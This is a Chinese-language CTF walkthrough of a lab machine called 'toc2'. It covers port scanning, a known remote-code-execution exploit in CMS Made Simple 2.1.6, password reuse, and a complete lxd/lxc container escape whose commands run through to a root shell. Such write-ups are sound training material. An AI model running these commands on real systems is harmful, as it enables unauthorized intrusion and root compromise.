Skip to main content

toc2

端口扫描

root@ip-10-10-249-90:~/toc2# nmap -sTCV -p 22,80 --min-rate 1000 10.10.159.121
Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-05 15:44 BST
Nmap scan report for ip-10-10-159-121.eu-west-1.compute.internal (10.10.159.121)
Host is up (0.00014s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 84:4e:b1:49:31:22:94:84:83:97:91:72:cb:23:33:36 (RSA)
|   256 cc:32:19:3f:f5:b9:a4:d5:ac:32:0f:6e:f0:83:35:71 (ECDSA)
|_  256 bd:d8:00:be:49:b5:15:af:bf:d5:85:f7:3a:ab:d6:48 (EdDSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/cmsms/cmsms-2.1.6-install.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site Maintenance
MAC Address: 02:54:9F:AF:93:27 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.21 seconds
root@ip-10-10-249-90:~/toc2#

80

从扫描结果来看 有一个 /cmsms/cmsms-2.1.6-install.php 页面, 然后我直接搜索发现其存在一个 RCE 漏洞 CMS Made Simple 2.1.6 - Remote Code Execution

从 EXP 来看我们需要获取一些东西:

  • 数据库的账号和密码 : 如果你自己查看首页内容你会发现其中提到了一个账号
  • 数据库的库名 : 在 robots.txt 中提到要使用 cmsmsdb 数据库

现在我们只需要按照 EXP 的指示进行操作即可

image-20240709182452119

操作完成后访问我们的文件我们就可以执行命令了

image-20240709182459017

后渗透

www-data

image-20240709182519434

www-data —> frank

再查看 frank 家目录时我发现一个文件, 其告诉所有机器默认密码都是 password , 所以我在此尝试密码重用

image-20240709182527088

frank —> root

在上面的输出中我们可以看到用户 frank 是 lxd 组用户, 所以我们可以借助 lxc 进行特权, 这里会麻烦一点你需要创建存储池

(remote) frank@toc:/tmp$ lxc storage create my-pool dir
Storage pool my-pool created
(remote) frank@toc:/tmp$ lxc storage list
+---------+-------------+--------+------------------------------------+---------+
|  NAME   | DESCRIPTION | DRIVER |               SOURCE               | USED BY |
+---------+-------------+--------+------------------------------------+---------+
| my-pool |             | dir    | /var/lib/lxd/storage-pools/my-pool | 0       |
+---------+-------------+--------+------------------------------------+---------+
(remote) frank@toc:/tmp$ lxc init myimage ignite -c security.privileged=true -s my-pool
Creating ignite

The container you are starting doesn't have any network attached to it.
  To create a new network, use: lxc network create
  To attach a network to a container, use: lxc network attach

(remote) frank@toc:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt recursive=true
Device mydevice added to ignite
(remote) frank@toc:/tmp$ lxc start ignite
(remote) frank@toc:/tmp$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)